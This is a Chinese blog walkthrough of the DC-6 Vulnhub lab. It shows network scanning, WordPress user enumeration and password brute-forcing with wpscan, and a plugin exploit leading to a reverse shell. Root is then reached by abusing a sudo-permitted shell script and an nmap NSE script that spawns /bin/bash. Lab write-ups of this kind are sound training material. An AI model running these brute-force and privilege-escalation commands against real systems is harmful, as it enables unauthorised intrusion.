【Vulnhub靶机】DC-6(nmap提权)

本文讲述了在DC-6靶场环境中进行信息收集、主机扫描、端口探测,发现WordPress漏洞后,通过wpscan进行用户名和密码爆破,最终实现提权的过程。涉及的技术包括NAT配置、MAC地址识别和使用工具如netdiscover和nmap进行渗透测试。
摘要由CSDN通过智能技术生成

先去看看DC-6的官网描述,看看有没有给出提示信息

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

把这个线索信息先复制下来

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

开始前先要吧 kali和DC-6靶机放在统一网段,都换成NAT模式

然后看一下DC-6的MAC地址
在这里插入图片描述

靶机的MAC地址00:0C:29:FA:57:22

信息收集

主机扫描

netdiscover -r 192.168.80.0/24

在这里插入图片描述

端口扫描

nmap -A -T4 -p- 192.168.80.140

在这里插入图片描述

发现靶机开起来80端口和22端口

根据DC-6靶场的文档描述,需要修改hosts文件

vim /etc/hosts   #靶机的地址和域名映射

在这里插入图片描述

通过kali自带的浏览器访问靶机的80的端口

在这里插入图片描述

发现是WordPress的站点,这跟DC-2的是一样的站点,那就可以跟DC-2一样用wpscan来扫描这个站点的漏洞

先爆破一下目录看看

dirsearch -u 192.168.80.140 -i 200

image-20230807211541514

使用御剑爆破一下

image-20230807210928594

进入登录页面,现在还不知道密码和账户,

image-20230807211339375

漏洞利用

使用wpscan进行枚举爆破用户名

wpscan --url http://wordy/ -e u   # 枚举 WordPress 站点中注册过的用户名,来制作用户名字典。

image-20230807211708308

把账户写进/tmp/user.txt文件里

现在有了账户,还没密码,需要用靶场文档描述里说的线索提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image-20230807211905462

报错说没有目录,可以使用cd命令,过去看一看

image-20230807212014292

gunzip rockyou.txt.gz

image-20230807212132262

image-20230807212336871


image-20230807212734164

现在有了用户字典,有了密码字典,继续使用wpscan密码爆破

注意:是在/tmp目录下进行爆破

wpscan --url http://wordy/ -U user.txt -P passwords.txt # 调用相关的字典文件对网站进行爆破。

image-20230808104100218

image-20230808104037655

爆破完用mark helpdesk01做登录

image-20230807214339649

搜索Activity monitor这个插件有没有漏洞

image-20230807215324697

找一下漏洞的绝对路径

image-20230807215416791

用python执行这个脚本

image-20230807220925693

提权

新建一个终端,监听8989

image-20230807221024541

然后在刚才的终端里输入反弹shell

image-20230807221149955

已经监听到了

image-20230807221204336

使用python交互shell

python  -c "import pty;pty.spawn('/bin/bash')"

image-20230807221418750

在mark的家目录里发现有用的信息

image-20230807221648562

查看su graham切换用户,发现可以使用su这个命令

image-20230807221823126

使用sudo -l查看能使用哪些root权限的命令

image-20230807221908392

切换到jens的家目录看一下

image-20230807221954668

可以往里面追加/bin/bash

image-20230807222049870

使用sudo -u jens ./backups.sh

  • -u 指定用户

切换到了jens用户

image-20230807222251746

继续使用sudo -l 查看

image-20230807222325061

echo "os.execute('/bin/bash')" > shell.nse

image-20230807223133277

利用nmap提权

sudo -u root nmap --script=shell.nse
#以root用户执行namp脚本

image-20230807223257282

进入/root下查看有无文件

image-20230807223457255


评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值